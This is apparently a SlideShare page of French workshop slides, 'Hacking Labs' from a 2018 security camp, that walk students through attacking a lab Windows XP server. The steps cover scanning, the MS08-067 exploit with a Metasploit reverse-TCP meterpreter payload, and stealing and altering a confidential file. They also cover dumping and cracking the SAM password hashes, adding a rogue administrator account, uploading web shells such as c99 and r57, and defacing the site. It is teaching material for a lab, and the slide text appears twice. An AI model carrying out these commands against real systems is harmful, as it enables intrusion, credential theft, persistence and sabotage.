SlideShare une entreprise Scribd logo
1  sur  37
Télécharger pour lire hors ligne
Hacking Labs
9 Octobre 2018
Marc Arnaert 1
1- PROBE : 45’
• Démarrer VM web et Kali
• Ouvrir le site web http://www.culture-velo.com
• Ping www.culture-velo.com
• ->adresse ip
Marc Arnaert 2
Sous Kali : Nmap
• Ouvrir une session (root/root) et demarrer ssh
• Ping 192.168.10.200
• -> on atteint la machine
• On scan en TCP
• nmap -sS -vv 192.168.10.200
• –sS : Type de Scan TCP SYN et –vv : verbose
• On commente les 8 ports ouverts
• nmap -sS -vv -O 192.168.10.200
• -O : Permet d’avoir la detection de l’OS
• nmap : pour montrer la liste des commandes dispo
Marc Arnaert 3
Sous Kali : ZenMap
• Menu haut Applications / 1- Inf. gathering / Zenmap
• Target : Mettre 192.168.10.200
• Profile : en Slow comprehensive scan
• Attendre le service scan Timing finisse (2 minutes)
• Attendre que le NSE Timing finisse (4 minutes)
• En attendant, on peut passer à Nessus
Marc Arnaert 4
Sous Kali : ZenMap
• Une fois le scan terminé, remonter vers le haut.
• Commenter les ports ouvert en VERT
• La version du service, l’éditeur,
• le nom netbios de la machine
• Discuter du contenu http puis descendre
• Expliquer les méthodes supportées et les risques
avérés.
• Discuter du 3389 et du chiffrement RC4
Marc Arnaert 5
Sous Kali : ZenMap
• Il y a 9 services vert dont le ntp en plus
• Il y a 6 services en plus mais filtré
• Discuter de la partie smb
– Nom de l’ordinateur
– Son groupe d’appartenance
– La signature des messages désactivé
Marc Arnaert 6
Nessus
• Lancer le service : service nessusd start
• Lancer un navigateur sur https://localhost:8834
• S’identifier admin / root
• Cliquer sur NEW scan en haut à droite
• On choisi Basic Network Scan
• Remplir : le nom et l’adresse ip
Marc Arnaert 7
Marc Arnaert 8
• Lancez un nouveau Scan :
• Pour faire patienter, revenir sur ZENMAP
• Revenir pour vérifier que Nessus à fini
• Lancer OpenVas puis revenir ici
Marc Arnaert 9
NESSUS - Resultat
• On clic sur le résultat
• 17 vulnérabilités
• On clic sur le rouge
• Commenter le 067
• Faire un export
Marc Arnaert 10
openvas
• service postgresql start
• Applications / 2 – Vulnerability analysis / openvas start
• https://localhost:9392
• admin / root
• Configuration / Target / Etoile bleue à gauche
• Name : www.culture-velo.com
• Manual et 192.168.10.200
• Port List : All privileged tcp (commenter)
• Alive Test : consider alive
• Create
Marc Arnaert 11
openvas
• Choisir Scan puis Tasks puis l’étoile bleue
• Name : Tache1
• Create
• Lancement par la flèche verte (5minutes)
• Retourner à Nessus,
Marc Arnaert 12
Nikto & Uniscan : vulnérabilité web
• Lancez en shell Kali :
• nikto -h 192.168.10.200
• Explorons maintenant des scanners qui
permettent de tester des injections SQL ou faire
du XSS :
• Lancez en shell Kali :
• uniscan -u http://192.168.10.200 -ds
Marc Arnaert 13
Fin Probe
• Qu’est ce que l’on a pu voir dans cette 1er partie ?
• Différents type de scan
• Différents type de port
• Service associés aux ports
• Vulnérabilités connus en rapport service / port
• -> PENETRATE
Marc Arnaert 14
2 - PENETRATE 20’
• cd /root; mkdir hack; cd hack
• msfconsole
• use windows/smb/ms08_067_netapi
• set payload windows/meterpreter/reverse_tcp
• set lhost 192.168.10.129
• set rhost 192.168.10.200
• set lport 4444
• set rport 445
Marc Arnaert 15
METASPLOIT
• Exploit
• Commenter ce que l’on vient de faire ?
• Shell
• Commenter ?
Marc Arnaert 16
Sur le hôte distant
• cd 
• cd Documents and Settings
• cd administrateur
• cd Bureau
• dir
Commenter le fichier ultraconfidentiel
mkdir HACK
Aller voir le bureau de la vulnérable : commentez
Marc Arnaert 17
Exfiltration de données
• Exit
• cd ..
• cd ..
• cd “Documents and Settings”
• cd administrateur
• cd Bureau
• ls
Marc Arnaert 18
Modification de données
• Ouvrir un autre ssh
• Aller dans /root/hack
• Faire un ls et revenir sous meterpreter
• download ultra_confidentiel.txt
• Visualiser le fichier ultra_confidentiel
• Ajouter au début :ANONYMOUS ARE HERE !!!
• Faire un ls et revenir sous meterpreter
• upload ultra_confidentiel.txt
• Aller sur la vm, commenter le fichier modifié
Marc Arnaert 19
Capture d’écran à distance
• Revenir sous metasploit et lancer
• Screenshot
• Ouvrir un filezilla sur roothack
• Récupérer l’image et commenter
Marc Arnaert 20
Export des mots de passe
Sous metasploit :
• shell
• reg save HKLMSAM c:SAM
• reg save HKLMSYSTEM c:SYSTEM
• exit
• cd /
• download sam
• download system
Marc Arnaert 21
Casses des mots de passe
• Dans l’autre ssh sous /root/hack
• pwdump system sam
• pwdump system sam > hash.txt
• Ouvrir hash.txt pour voir la ligne admin.
• john hash.txt --format=NT
• Commenter le mot de passe cracké
Marc Arnaert 22
Armitage
• Lancer Armitage
• Hosts / Add Host
Marc Arnaert 23
• Lancer un scan
• Définir le
• hote en tant
• que XP
Marc Arnaert 24
Lancer une attaque
• Menu haut Attacks / find attacks
• Clic droit :
Marc Arnaert 25
ATTACK
• Lancer l’attaque :
Marc Arnaert 26
HACK !
• Et voilà :
• Clic droit / meterpreter / Explore /
-> Browse files
-> ScreenShoot
• Commenter ….
Marc Arnaert 27
3 – PERSIST 10’
• Fermer la session sur vulnérable
• Changement du mot de passe de la vulnerable
• Retourner dans le ssh metasploit
• shell
• net user administrateur anonymous
• Aller sur la machine vulnerable et ouvrir avec
le mot de passe maison : echec
• Utiliser anonymous et commenter !!
Marc Arnaert 28
Elévation de privilèges
• Ouvrir le gestionnaire des utilisateurs et
montrer que l’utilisateur hack n’existe pas
• Lancer une commande :
• net user hack anonymous /add
• net localgroup administrateurs hack /add
Marc Arnaert 29
Elévation de privilèges
• Aller sur la vulnérable
• Fermer la session
• Seule la session HACK est présente
• Ouvrir la session HACK / anonymous
Marc Arnaert 30
Comment Persist
• Changer le mot de passe administrateurs
• Creation d’un compte de hack
• Elevation de privileges sur le compte
• Vérifier le site web http://192.168.10.200
Marc Arnaert 31
4 – PARALYSE 15’
• Dechiffrer backdoor.zipe.pae (mdp backdoor)
• copier backdoor.zipe via ftp sous /root/hack
• cd /root/hack
• Le renommer en backdoor.zip
• mv backdoor.zipe backdoor.zip
• unzip backdoor.zip
Marc Arnaert 32
Infiltration de backdoor
• revenir sous armitage,
• se placer sous c:Inetpubwwwrootshop
• et uploader
• Simattacker, tryag,
• c99, dq, r57,
• cwshelldumper,
Marc Arnaert 33
Execution de backdoor
• Lancer http://www.culture-velo.com/...
• Simattacker
• tryag,
• C99
• Dq
• r57,
• cwshelldumper,
Marc Arnaert 34
Les hackers ne donnent rien …
• Faire une capture d’écran de r57 avec en bas :
Marc Arnaert 35
Paralyse
• On peut effacer le contenu du site
• Uploader defac/index.htm
• Faire des mv index.jp0 index.jpg
• Uploader index.jpg
Marc Arnaert 36
Fin…
Certains ne savent même pas qu’ils ont été
hacké
http://hexus.se/wp-content/
Marc Arnaert 37

Contenu connexe

Plus de TelecomValley

Plus de TelecomValley (20)

Revue de presse Telecom Valley - Février 2020
Revue de presse Telecom Valley - Février 2020Revue de presse Telecom Valley - Février 2020
Revue de presse Telecom Valley - Février 2020
 
Revue de presse Telecom Valley - Janvier 2020
Revue de presse Telecom Valley - Janvier 2020Revue de presse Telecom Valley - Janvier 2020
Revue de presse Telecom Valley - Janvier 2020
 
Revue de presse Telecom Valley - Décembre 2019
Revue de presse Telecom Valley - Décembre 2019Revue de presse Telecom Valley - Décembre 2019
Revue de presse Telecom Valley - Décembre 2019
 
Revue de presse Telecom Valley - Novembre 2019
Revue de presse Telecom Valley - Novembre 2019Revue de presse Telecom Valley - Novembre 2019
Revue de presse Telecom Valley - Novembre 2019
 
Revue de presse Telecom Valley - Octobre 2019
Revue de presse Telecom Valley - Octobre 2019Revue de presse Telecom Valley - Octobre 2019
Revue de presse Telecom Valley - Octobre 2019
 
Revue de presse Telecom Valley - Septembre 2019
Revue de presse Telecom Valley - Septembre 2019Revue de presse Telecom Valley - Septembre 2019
Revue de presse Telecom Valley - Septembre 2019
 
Présentation Team France Export régionale - 29/11/19
Présentation Team France Export régionale - 29/11/19Présentation Team France Export régionale - 29/11/19
Présentation Team France Export régionale - 29/11/19
 
2019 - NOURI - ALL4TEST- Le BDD pour decouvrir et specifier les besoins metie...
2019 - NOURI - ALL4TEST- Le BDD pour decouvrir et specifier les besoins metie...2019 - NOURI - ALL4TEST- Le BDD pour decouvrir et specifier les besoins metie...
2019 - NOURI - ALL4TEST- Le BDD pour decouvrir et specifier les besoins metie...
 
Tester c'est bien, monitorer c'est mieux - 2019 - KISSI - Soirée du Test Logi...
Tester c'est bien, monitorer c'est mieux - 2019 - KISSI - Soirée du Test Logi...Tester c'est bien, monitorer c'est mieux - 2019 - KISSI - Soirée du Test Logi...
Tester c'est bien, monitorer c'est mieux - 2019 - KISSI - Soirée du Test Logi...
 
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
Et si mon test était la spécification de mon application ? - JACOB - iWE - So...
 
A la poursuite du bug perdu - 2019 - THEAULT - DI GIORGIO - ACPQUALIFE
A la poursuite du bug perdu - 2019 - THEAULT - DI GIORGIO - ACPQUALIFEA la poursuite du bug perdu - 2019 - THEAULT - DI GIORGIO - ACPQUALIFE
A la poursuite du bug perdu - 2019 - THEAULT - DI GIORGIO - ACPQUALIFE
 
2019 - HAGE CHAHINE - ALTRAN - Presentation-DecouverteMondeAgile_V1.1
2019 - HAGE CHAHINE - ALTRAN - Presentation-DecouverteMondeAgile_V1.12019 - HAGE CHAHINE - ALTRAN - Presentation-DecouverteMondeAgile_V1.1
2019 - HAGE CHAHINE - ALTRAN - Presentation-DecouverteMondeAgile_V1.1
 
Treat Your Unit Tests As Production Code - DARGO - Amadeus - Soirée du Test L...
Treat Your Unit Tests As Production Code - DARGO - Amadeus - Soirée du Test L...Treat Your Unit Tests As Production Code - DARGO - Amadeus - Soirée du Test L...
Treat Your Unit Tests As Production Code - DARGO - Amadeus - Soirée du Test L...
 
IA pour les tests logiciels - LEGEARD - Smartesting Université Franche Comté-...
IA pour les tests logiciels - LEGEARD - Smartesting Université Franche Comté-...IA pour les tests logiciels - LEGEARD - Smartesting Université Franche Comté-...
IA pour les tests logiciels - LEGEARD - Smartesting Université Franche Comté-...
 
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
Tester en continu avec le Cloud - GACHE HUCKERT - AXA FRANCE - Soirée du Test...
 
La stratégie de test sur un système multi-environnements - POTEL HAGE CHAHINE...
La stratégie de test sur un système multi-environnements - POTEL HAGE CHAHINE...La stratégie de test sur un système multi-environnements - POTEL HAGE CHAHINE...
La stratégie de test sur un système multi-environnements - POTEL HAGE CHAHINE...
 
Tests exploratoires & IA - BLANC ASSANTE DI CAPILLO - Promyze Amadeus - Soiré...
Tests exploratoires & IA - BLANC ASSANTE DI CAPILLO - Promyze Amadeus - Soiré...Tests exploratoires & IA - BLANC ASSANTE DI CAPILLO - Promyze Amadeus - Soiré...
Tests exploratoires & IA - BLANC ASSANTE DI CAPILLO - Promyze Amadeus - Soiré...
 
Continuous testing - GUERLAIS ARGOT - Air France KLM Sogeti- Soirée du Test L...
Continuous testing - GUERLAIS ARGOT - Air France KLM Sogeti- Soirée du Test L...Continuous testing - GUERLAIS ARGOT - Air France KLM Sogeti- Soirée du Test L...
Continuous testing - GUERLAIS ARGOT - Air France KLM Sogeti- Soirée du Test L...
 
Tests d'intégration de micro-services : approche pilotée par les contrats - R...
Tests d'intégration de micro-services : approche pilotée par les contrats - R...Tests d'intégration de micro-services : approche pilotée par les contrats - R...
Tests d'intégration de micro-services : approche pilotée par les contrats - R...
 
Indicateurs REPaReD pour le Testing Craftmanship - MOUSTIER - GFI Informatiqu...
Indicateurs REPaReD pour le Testing Craftmanship - MOUSTIER - GFI Informatiqu...Indicateurs REPaReD pour le Testing Craftmanship - MOUSTIER - GFI Informatiqu...
Indicateurs REPaReD pour le Testing Craftmanship - MOUSTIER - GFI Informatiqu...
 

Hacking Labs Sophia Security Camp 2018

  • 1. Hacking Labs 9 Octobre 2018 Marc Arnaert 1
  • 2. 1- PROBE : 45’ • Démarrer VM web et Kali • Ouvrir le site web http://www.culture-velo.com • Ping www.culture-velo.com • ->adresse ip Marc Arnaert 2
  • 3. Sous Kali : Nmap • Ouvrir une session (root/root) et demarrer ssh • Ping 192.168.10.200 • -> on atteint la machine • On scan en TCP • nmap -sS -vv 192.168.10.200 • –sS : Type de Scan TCP SYN et –vv : verbose • On commente les 8 ports ouverts • nmap -sS -vv -O 192.168.10.200 • -O : Permet d’avoir la detection de l’OS • nmap : pour montrer la liste des commandes dispo Marc Arnaert 3
  • 4. Sous Kali : ZenMap • Menu haut Applications / 1- Inf. gathering / Zenmap • Target : Mettre 192.168.10.200 • Profile : en Slow comprehensive scan • Attendre le service scan Timing finisse (2 minutes) • Attendre que le NSE Timing finisse (4 minutes) • En attendant, on peut passer à Nessus Marc Arnaert 4
  • 5. Sous Kali : ZenMap • Une fois le scan terminé, remonter vers le haut. • Commenter les ports ouvert en VERT • La version du service, l’éditeur, • le nom netbios de la machine • Discuter du contenu http puis descendre • Expliquer les méthodes supportées et les risques avérés. • Discuter du 3389 et du chiffrement RC4 Marc Arnaert 5
  • 6. Sous Kali : ZenMap • Il y a 9 services vert dont le ntp en plus • Il y a 6 services en plus mais filtré • Discuter de la partie smb – Nom de l’ordinateur – Son groupe d’appartenance – La signature des messages désactivé Marc Arnaert 6
  • 7. Nessus • Lancer le service : service nessusd start • Lancer un navigateur sur https://localhost:8834 • S’identifier admin / root • Cliquer sur NEW scan en haut à droite • On choisi Basic Network Scan • Remplir : le nom et l’adresse ip Marc Arnaert 7
  • 9. • Lancez un nouveau Scan : • Pour faire patienter, revenir sur ZENMAP • Revenir pour vérifier que Nessus à fini • Lancer OpenVas puis revenir ici Marc Arnaert 9
  • 10. NESSUS - Resultat • On clic sur le résultat • 17 vulnérabilités • On clic sur le rouge • Commenter le 067 • Faire un export Marc Arnaert 10
  • 11. openvas • service postgresql start • Applications / 2 – Vulnerability analysis / openvas start • https://localhost:9392 • admin / root • Configuration / Target / Etoile bleue à gauche • Name : www.culture-velo.com • Manual et 192.168.10.200 • Port List : All privileged tcp (commenter) • Alive Test : consider alive • Create Marc Arnaert 11
  • 12. openvas • Choisir Scan puis Tasks puis l’étoile bleue • Name : Tache1 • Create • Lancement par la flèche verte (5minutes) • Retourner à Nessus, Marc Arnaert 12
  • 13. Nikto & Uniscan : vulnérabilité web • Lancez en shell Kali : • nikto -h 192.168.10.200 • Explorons maintenant des scanners qui permettent de tester des injections SQL ou faire du XSS : • Lancez en shell Kali : • uniscan -u http://192.168.10.200 -ds Marc Arnaert 13
  • 14. Fin Probe • Qu’est ce que l’on a pu voir dans cette 1er partie ? • Différents type de scan • Différents type de port • Service associés aux ports • Vulnérabilités connus en rapport service / port • -> PENETRATE Marc Arnaert 14
  • 15. 2 - PENETRATE 20’ • cd /root; mkdir hack; cd hack • msfconsole • use windows/smb/ms08_067_netapi • set payload windows/meterpreter/reverse_tcp • set lhost 192.168.10.129 • set rhost 192.168.10.200 • set lport 4444 • set rport 445 Marc Arnaert 15
  • 16. METASPLOIT • Exploit • Commenter ce que l’on vient de faire ? • Shell • Commenter ? Marc Arnaert 16
  • 17. Sur le hôte distant • cd • cd Documents and Settings • cd administrateur • cd Bureau • dir Commenter le fichier ultraconfidentiel mkdir HACK Aller voir le bureau de la vulnérable : commentez Marc Arnaert 17
  • 18. Exfiltration de données • Exit • cd .. • cd .. • cd “Documents and Settings” • cd administrateur • cd Bureau • ls Marc Arnaert 18
  • 19. Modification de données • Ouvrir un autre ssh • Aller dans /root/hack • Faire un ls et revenir sous meterpreter • download ultra_confidentiel.txt • Visualiser le fichier ultra_confidentiel • Ajouter au début :ANONYMOUS ARE HERE !!! • Faire un ls et revenir sous meterpreter • upload ultra_confidentiel.txt • Aller sur la vm, commenter le fichier modifié Marc Arnaert 19
  • 20. Capture d’écran à distance • Revenir sous metasploit et lancer • Screenshot • Ouvrir un filezilla sur roothack • Récupérer l’image et commenter Marc Arnaert 20
  • 21. Export des mots de passe Sous metasploit : • shell • reg save HKLMSAM c:SAM • reg save HKLMSYSTEM c:SYSTEM • exit • cd / • download sam • download system Marc Arnaert 21
  • 22. Casses des mots de passe • Dans l’autre ssh sous /root/hack • pwdump system sam • pwdump system sam > hash.txt • Ouvrir hash.txt pour voir la ligne admin. • john hash.txt --format=NT • Commenter le mot de passe cracké Marc Arnaert 22
  • 23. Armitage • Lancer Armitage • Hosts / Add Host Marc Arnaert 23
  • 24. • Lancer un scan • Définir le • hote en tant • que XP Marc Arnaert 24
  • 25. Lancer une attaque • Menu haut Attacks / find attacks • Clic droit : Marc Arnaert 25
  • 26. ATTACK • Lancer l’attaque : Marc Arnaert 26
  • 27. HACK ! • Et voilà : • Clic droit / meterpreter / Explore / -> Browse files -> ScreenShoot • Commenter …. Marc Arnaert 27
  • 28. 3 – PERSIST 10’ • Fermer la session sur vulnérable • Changement du mot de passe de la vulnerable • Retourner dans le ssh metasploit • shell • net user administrateur anonymous • Aller sur la machine vulnerable et ouvrir avec le mot de passe maison : echec • Utiliser anonymous et commenter !! Marc Arnaert 28
  • 29. Elévation de privilèges • Ouvrir le gestionnaire des utilisateurs et montrer que l’utilisateur hack n’existe pas • Lancer une commande : • net user hack anonymous /add • net localgroup administrateurs hack /add Marc Arnaert 29
  • 30. Elévation de privilèges • Aller sur la vulnérable • Fermer la session • Seule la session HACK est présente • Ouvrir la session HACK / anonymous Marc Arnaert 30
  • 31. Comment Persist • Changer le mot de passe administrateurs • Creation d’un compte de hack • Elevation de privileges sur le compte • Vérifier le site web http://192.168.10.200 Marc Arnaert 31
  • 32. 4 – PARALYSE 15’ • Dechiffrer backdoor.zipe.pae (mdp backdoor) • copier backdoor.zipe via ftp sous /root/hack • cd /root/hack • Le renommer en backdoor.zip • mv backdoor.zipe backdoor.zip • unzip backdoor.zip Marc Arnaert 32
  • 33. Infiltration de backdoor • revenir sous armitage, • se placer sous c:Inetpubwwwrootshop • et uploader • Simattacker, tryag, • c99, dq, r57, • cwshelldumper, Marc Arnaert 33
  • 34. Execution de backdoor • Lancer http://www.culture-velo.com/... • Simattacker • tryag, • C99 • Dq • r57, • cwshelldumper, Marc Arnaert 34
  • 35. Les hackers ne donnent rien … • Faire une capture d’écran de r57 avec en bas : Marc Arnaert 35
  • 36. Paralyse • On peut effacer le contenu du site • Uploader defac/index.htm • Faire des mv index.jp0 index.jpg • Uploader index.jpg Marc Arnaert 36
  • 37. Fin… Certains ne savent même pas qu’ils ont été hacké http://hexus.se/wp-content/ Marc Arnaert 37